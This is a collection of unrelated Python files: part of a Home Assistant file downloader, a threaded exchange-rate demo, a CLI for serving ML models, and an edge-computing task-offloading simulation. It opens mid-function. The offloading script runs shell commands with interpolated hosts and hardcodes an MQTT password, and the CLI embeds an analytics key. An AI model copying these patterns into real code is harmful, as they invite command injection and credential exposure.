if not validate_config(config, {DOMAIN: [CONF_DOWNLOAD_DIR]}, logger):
return False
download_path = config[DOMAIN][CONF_DOWNLOAD_DIR]
# If path is relative, we assume relative to HASS config dir
if not os.path.isabs(download_path):
download_path = hass.config.path(download_path)
if not os.path.isdir(download_path):
logger.error(
"Download path %s does not exist. File Downloader not active.",
download_path)
return False
def download_file(service):
"""Start thread to download file specified in the URL."""
def do_download():
"""Download the file."""
try:
url = service.data[ATTR_URL]
subdir = service.data.get(ATTR_SUBDIR)
if subdir:
subdir = sanitize_filename(subdir)
final_path = None
req = requests.get(url, stream=True, timeout=10)
if req.status_code == 200:
filename = None
if 'content-disposition' in req.headers:
match = re.findall(r"filename=(\S+)",
req.headers['content-disposition'])
if len(match) > 0:
filename = match[0].strip("'\" ")
if not filename:
filename = os.path.basename(
url).strip()
if not filename:
filename = "ha_download"
# Remove stuff to ruin paths
filename = sanitize_filename(filename)
# Do we want to download to subdir, create if needed
if subdir:
subdir_path = os.path.join(download_path, subdir)
# Ensure subdir exist
if not os.path.isdir(subdir_path):
os.makedirs(subdir_path)
final_path = os.path.join(subdir_path, filename)
else:
final_path = os.path.join(download_path, filename)
path, ext = os.path.splitext(final_path)
# If file exist append a number.
# We test filename, filename_2..
tries = 1
final_path = path + ext
while os.path.isfile(final_path):
tries += 1
final_path = "{}_{}.{}".format(path, tries, ext)
logger.info("%s -> %s", url, final_path)
with open(final_path, 'wb') as fil:
for chunk in req.iter_content(1024):
fil.write(chunk)
logger.info("Downloading of %s done", url)
except requests.exceptions.ConnectionError:
logger.exception("ConnectionError occured for %s", url)
# Remove file if we started downloading but failed
if final_path and os.path.isfile(final_path):
os.remove(final_path)
threading.Thread(target=do_download).start()
hass.services.register(DOMAIN, SERVICE_DOWNLOAD_FILE, download_file,
schema=SERVICE_DOWNLOAD_FILE_SCHEMA)
return True
|
get_rates.py
|
""" main module """
from concurrent.futures import ThreadPoolExecutor
from datetime import date
from requests import request
import time
import threading
from rates_demo.business_days import business_days
def get_rates() -> None:
""" get the rates """
start_date = date(2021, 1, 1)
end_date = date(2021, 3, 31)
rate_responses: list[str] = []
for business_day in business_days(start_date, end_date):
rate_url = "".join([
"http://127.0.0.1:5000/api/",
str(business_day),
"?base=USD&symbols=EUR"])
response = request("GET", rate_url)
rate_responses.append(response.text)
# for rate_response in rate_responses:
# print(rate_response)
print(f"num of responses: {len(rate_responses)}")
print(rate_responses)
def get_rate_task(business_day: date, responses: list[str]) -> None:
""" get rate task function """
rate_url = "".join([
"http://127.0.0.1:5000/api/",
str(business_day),
"?base=USD&symbols=EUR"])
response = request("GET", rate_url)
responses.append(response.text)
def get_rates_threaded() -> None:
""" get the rates """
start_date = date(2021, 1, 1)
end_date = date(2021, 3, 31)
rate_responses: list[str] = []
threads: list[threading.Thread] = []
for business_day in business_days(start_date, end_date):
a_thread = threading.Thread(
target=get_rate_task, args=(business_day,rate_responses))
a_thread.start()
threads.append(a_thread)
for a_thread in threads:
a_thread.join()
print(f"num of responses: {len(rate_responses)}")
print(rate_responses)
# threadpool version
# def get_rates_threaded() -> None:
# """ get the rates """
# start_date = date(2021, 1, 1)
# end_date = date(2021, 3, 31)
# rate_responses: list[str] = []
# with ThreadPoolExecutor() as executor:
# rate_responses = list(executor.map(
# get_rate_task,
# [ business_day for business_day
# in business_days(start_date, end_date) ]))
# print(f"num of responses: {len(rate_responses)}")
# print(rate_responses)
# def get_rates_threaded_gen() -> None:
# """ get the rates """
# start_date = date(2021, 1, 1)
# end_date = date(2021, 3, 31)
# rate_responses: list[str] = []
# with ThreadPoolExecutor() as executor:
# executor.map(
# lambda params: get_rate_task(*params),
# ( (business_day, rate_responses) for business_day
# in business_days(start_date, end_date) ))
# print(f"num of responses: {len(rate_responses)}")
# if __name__ == "__main__":
# start = time.time()
# get_rates()
# print(f"original time elapsed: {time.time() - start}")
# start = time.time()
# get_rates_threaded()
# print(f"threaded time elapsed: {time.time() - start}")
# start = time.time()
# get_rates_threaded_gen()
# print(f"threaded time elapsed: {time.time() - start}")
|
main.py
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import os.path
import sys
import tempfile
import tfi
import tfi.driver
import tfi.driverconfig
from tfi.resolve.model import _detect_model_file_kind, _model_module_for_kind, _load_model_from_path_fn
from tfi.cli import resolve as _resolve_model
from tfi.tensor.codec import encode as _tfi_tensor_codec_encode
from tfi.format.iterm2 import imgcat as _tfi_format_iterm2_imgcat
def _detect_model_object_kind(model):
klass = model if isinstance(model, type) else type(model)
for c in klass.mro():
if c.__name__ != "Model":
continue
if c.__module__ == "tfi.driver.pytorch":
return "pytorch"
if c.__module__ == "tfi.driver.prophet":
return "prophet"
if c.__module__ == "tfi.driver.tf":
return "tensorflow"
if c.__module__ == "tfi.driver.msp":
return "msp"
if c.__module__ == "tfi.driver.spacy":
return "spacy"
raise Exception("Unknown model type %s" % klass)
def _model_export(path, model):
kind = _detect_model_object_kind(model)
mod = _model_module_for_kind(kind)
return mod.export(path, model)
def _model_publish(f):
from tfi.publish import publish as _publish
kind = _detect_model_file_kind(f)
_publish(kind, f)
class ModelSpecifier(argparse.Action):
def __init__(self,
option_strings,
dest,
**kwargs):
super(ModelSpecifier, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
def __call__(self, parser, namespace, values, option_string=None):
if values is None:
setattr(namespace, self.dest, None)
return
if values:
leading_value, *rest = values
else:
leading_value = None
rest = []
resolution = _resolve_model(leading_value, rest)
setattr(namespace, self.dest, resolution['model'])
setattr(namespace, "%s_module_fn" % self.dest, resolution.get('module_fn', lambda x: None))
setattr(namespace, "%s_can_refresh" % self.dest, resolution.get('can_refresh', None))
setattr(namespace, "%s_refresh_fn" % self.dest, resolution.get('refresh_fn', None))
setattr(namespace, "%s_method_fn" % self.dest, resolution['model_method_fn'])
setattr(namespace, "%s_source" % self.dest, resolution.get('source', None))
setattr(namespace, "%s_source_sha1hex" % self.dest, resolution.get('source_sha1hex', None))
setattr(namespace, "%s_via_python" % self.dest, resolution.get('via_python', None))
setattr(namespace, "%s_raw" % self.dest, resolution.get('leading_value', None))
parser = argparse.ArgumentParser(prog='tfi', add_help=False)
parser.add_argument('--serve', default=False, action='store_true', help='Start REST API on given port')
parser.add_argument('--tracing-host', type=str, default=os.environ.get('JAEGER_HOST', None), help='Jaeger host to submit traces to while serving')
parser.add_argument('--tracing-tags', type=str, default=os.environ.get('JAEGER_TAGS', ''), help='Jaeger tags to include in traces to while serving')
parser.add_argument('--internal-config', type=str, default=os.environ.get("TFI_INTERNAL_CONFIG", ""), help='For internal use.')
parser.add_argument('--publish', default=False, action='store_true', help='Publish model')
parser.add_argument('--bind', type=str, help='Set address:port to serve model on. Default behavior is 127.0.0.1 if available, otherwise 127.0.0.1:0')
parser.add_argument('--bind-default', type=str, default='127.0.0.1:5000')
parser.add_argument('--export', type=str, help='path to export to')
parser.add_argument('--export-doc', type=str, help='path to export doc to')
parser.add_argument('--watch', default=False, action='store_true', help='Watch given model and reload when it changes')
parser.add_argument('--interactive', '-i', default=None, action='store_true', help='Start interactive session')
parser.add_argument('--tf-tensorboard-bind-default', type=str, default='127.0.0.1:6007')
parser.add_argument('--tf-tensorboard-bind', type=str, help='Set address:port to serve TensorBoard on. Default behavior is 127.0.0.1:6007 if available, otherwise 127.0.0.1:0')
parser.add_argument('--tf-logdir',
default=os.path.expanduser('~/.tfi/tf/log/%F_%H-%M-%S/%04i'),
help='Set TensorFlow log dir to write to. Renders any % placeholders with strftime, runs TensorBoard from parent dir. %04i is replaced by a 0-padded run_id count')
parser.add_argument('specifier', type=str, default=None, nargs=argparse.REMAINDER, action=ModelSpecifier, help='fully qualified class name to instantiate')
# TODO(adamb)
# And let's add basic text --doc output.
# Then we'll add support for training a model locally ... (which?)
# Then we'll add support for training a model ELSEWHERE.
def run(argns, remaining_args):
model = None
module = None
exporting = argns.export is not None or argns.export_doc is not None
serving = argns.serve is not False
publishing = argns.publish is not False
batch = False
if argns.interactive is None:
argns.interactive = not batch and not exporting and not serving and not publishing
def tf_make_logdir_fn(datetime):
import re
base_logdir = datetime.strftime(argns.tf_logdir)
def logdir_fn(run_id=None):
if run_id is None:
return re.sub('(%\d*)i', '', base_logdir)
base_logdir_formatstr = re.sub('(%\d*)i', '\\1d', base_logdir)
return base_logdir_formatstr % run_id
return logdir_fn
import tfi
import tfi.driverconfig
tfi.driverconfig.tf.make_logdir_fn = tf_make_logdir_fn
if argns.specifier:
model = argns.specifier
module = argns.specifier_module_fn()
if argns.specifier_method_fn:
result = argns.specifier_method_fn()
accept_mimetypes = {"image/png": _tfi_format_iterm2_imgcat, "text/plain": lambda x: x}
result_val = _tfi_tensor_codec_encode(accept_mimetypes, result)
if result_val is None:
result_val = result
result_str = '%r\n' % (result_val, )
print(result_str)
batch = True
internal_config = argns.internal_config or (model and _detect_model_object_kind(model))
if internal_config == 'tensorflow':
import tensorflow
tensorboard = internal_config == 'tensorflow' and argns.interactive
if tensorboard:
import tfi.driver.tf.tensorboard_server
import threading
tb_logdir = argns.tf_logdir
while '%' in tb_logdir:
tb_logdir = os.path.dirname(tb_logdir)
if argns.tf_tensorboard_bind:
tb_host, tb_port = argns.tf_tensorboard_bind.split(':', 1)
tb_port = int(tb_port)
else:
tb_host, tb_port = argns.tf_tensorboard_bind_default.split(':', 1)
tb_port = int(tb_port)
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
try:
s.bind((tb_host, tb_port))
except socket.error as e:
if e.errno == 98:
tb_port = 0
# Use some fancy footwork to delay continuing until TensorBoard has started.
tb_cv = threading.Condition()
def tb_run():
def on_ready_fn(url):
if url:
print('TensorBoard at %s now serving %s' % (url, tb_logdir))
sys.stdout.flush()
with tb_cv:
tb_cv.notify_all()
tfi.driver.tf.tensorboard_server.main(tb_logdir, tb_host=tb_host, tb_port=tb_port, tb_on_ready_fn=on_ready_fn)
with tb_cv:
tb_thread = threading.Thread(target=tb_run, daemon=True)
tb_thread.start()
tb_cv.wait()
if internal_config == 'spacy':
import tfi.driver.spacy
if serving:
segment_js = """
<script>
!function(){var analytics=window.analytics=window.analytics||[];if(!analytics.initialize)if(analytics.invoked)window.console&&console.error&&console.error("Segment snippet included twice.");else{analytics.invoked=!0;analytics.methods=["trackSubmit","trackClick","trackLink","trackForm","pageview","identify","reset","group","track","ready","alias","debug","page","once","off","on"];analytics.factory=function(t){return function(){var e=Array.prototype.slice.call(arguments);e.unshift(t);analytics.push(e);return analytics}};for(var t=0;t<analytics.methods.length;t++){var e=analytics.methods[t];analytics[e]=analytics.factory(e)}analytics.load=function(t){var e=document.createElement("script");e.type="text/javascript";e.async=!0;e.src=("https:"===document.location.protocol?"https://":"http://")+"cdn.segment.com/analytics.js/v1/"+t+"/analytics.min.js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(e,n)};analytics.SNIPPET_VERSION="4.0.0";
analytics.load("GaappI2dkNZV4PLVdiJ8pHQ7Hofbf6Vz");
analytics.page();
}}();
</script>
"""
segment_js = ""
def on_bind(url):
print("Serving at %s" % url)
tracing_tags = {}
if argns.tracing_tags:
for tag_entry in argns.tracing_tags.split(' '):
tag_k, tag_v = tag_entry.split('=', 1)
tracing_tags[tag_k] = tag_v
if argns.bind:
host, port = argns.bind.split(':')
port = int(port)
else:
host, initial_port = argns.bind_default.split(':')
initial_port = int(initial_port)
port = 0
for possible_port in range(initial_port, initial_port + 32):
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
try:
s.bind((host, possible_port))
port = possible_port
break
except socket.error as e:
if e.errno == 98 or e.errno == 48:
pass
if model is None:
from tfi.serve import run_deferred as serve_deferred
serve_deferred(
host=host, port=port, on_bind=on_bind,
load_model_from_path_fn=_load_model_from_path_fn,
extra_scripts=segment_js,
jaeger_host=argns.tracing_host,
jaeger_tags=tracing_tags)
else:
from tfi.serve import run as serve
def model_file_fn():
if argns.specifier_source and not argns.specifier_via_python:
return argns.specifier_source
with tempfile.NamedTemporaryFile(mode='rb', delete=False) as f:
print("Exporting ...", end='', flush=True)
_model_export(f.name, model)
print(" done", flush=True)
return f.name
serve(model,
host=host,
port=port,
on_bind=on_bind,
extra_scripts=segment_js,
jaeger_host=argns.tracing_host,
jaeger_tags=tracing_tags,
model_file_fn=model_file_fn)
if argns.watch:
if not argns.specifier_can_refresh:
print("WARN: Can't watch unrefreshable model.")
else:
import tfi.watch
ar = tfi.watch.AutoRefresher()
def do_refresh():
def refresh_progress(model, ix, total):
print("Refreshing %d/%d: %s" % (ix, total, model))
argns.specifier_refresh_fn(refresh_progress)
ar.watch(argns.specifier_source, argns.specifier_source_sha1hex, do_refresh)
ar.start()
if argns.interactive:
from tfi.repl import run as run_repl
run_repl(
globals=globals(),
locals=None,
history_filename=os.path.expanduser('~/.tfihistory'),
model=model,
module=module)
if argns.export_doc:
tfi.doc.save(argns.export_doc, model)
if argns.export:
if argns.specifier_source and not argns.specifier_via_python:
import shutil
shutil.copyfile(argns.specifier_source, argns.export)
else:
_model_export(argns.export, model)
if argns.publish:
if argns.specifier_source and not argns.specifier_via_python:
with open(argns.specifier_source, 'rb') as f:
# TODO(adamb) Should actually autodetect which environment to use.
url = _model_publish(f)
else:
with tempfile.NamedTemporaryFile(mode='rb') as f:
# TODO(adamb) Should actually autodetect which environment to use.
print("Exporting ...", end='', flush=True)
_model_export(f.name, model)
print(" done", flush=True)
url = _model_publish(f)
print(url)
def cli(args):
argns, remaining_args = parser.parse_known_args(args)
argns.load_model_from_path_fn = _load_model_from_path_fn
run(argns, remaining_args)
def main():
cli(sys.argv[1:])
if __name__ == '__main__':
main()
|
algo_six.py
|
from functools import reduce
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
import argparse
import pickle
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
received_time = []
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
total_received_task = 0
def edf():
global total_received_task
t_lcm = lcm([tasks[i]['period'] for i in tasks])
t_dead = {i: tasks[i]['deadline'] for i in tasks}
sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
# print(sorted_dead)
ready_task = []
for i in sorted_dead:
period = tasks[i[0]]['period']
# print('lcm: ', t_lcm, ' period: ', period)
t_range = int(t_lcm / period)
last_dead = 0
for j in range(t_range):
ready_task.append((i[0], last_dead + tasks[i[0]]['deadline']))
last_dead += period
ready_task = sorted(ready_task, key=lambda t: t[1])
print(ready_task)
t_time_ = 0
schedule = []
missed = []
register = {i: 0 for i in tasks.keys()} # {ti : amount executed}
for i in ready_task:
if (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
while (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
t_time_ += 1
# schedule.append(('idle', t_time))
if (t_time_ // tasks[i[0]]['period']) + 1 > register[i[0]]:
if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
register[i[0]] += 1
t_time_ += tasks[i[0]]['wcet']
schedule.append(i[0])
else:
print('Deadline missed: ', i)
missed.append(i[0])
# print('s : ', schedule)
# print('r: ', register)
if len(missed) > 0:
# print('missed deadline: ', missed)
cooperative_mec(missed)
_edf_ = task_time_map(schedule, tasks)
total_received_task += len(_edf_)
return _edf_
# generate execution sequence
def wait_die(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 'w' or 0 in work:
if 0 in work:
ind = work.index(0)
i = processes[ind]
elif 'w' in work:
# print('wk: ', work)
ind = work.index('w')
i = processes[ind]
else:
break
# print('comparing| process: ', i, _need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
# print('added: ', exec_seq)
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', _need[_max])
if processes.index(_max) > processes.index(i): # if true, i is older
# if process is already waiting then offload process
if work[ind] == 'w':
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
# print('offload reentry: ', i, offload)
else:
# wait put process to waiting
work[processes.index(i)] = 'w'
# print('waiting: ', i)
else:
# abort i
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
# print('offload: ', i)
if len(offload) > 0:
# print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
# print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wait_die(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
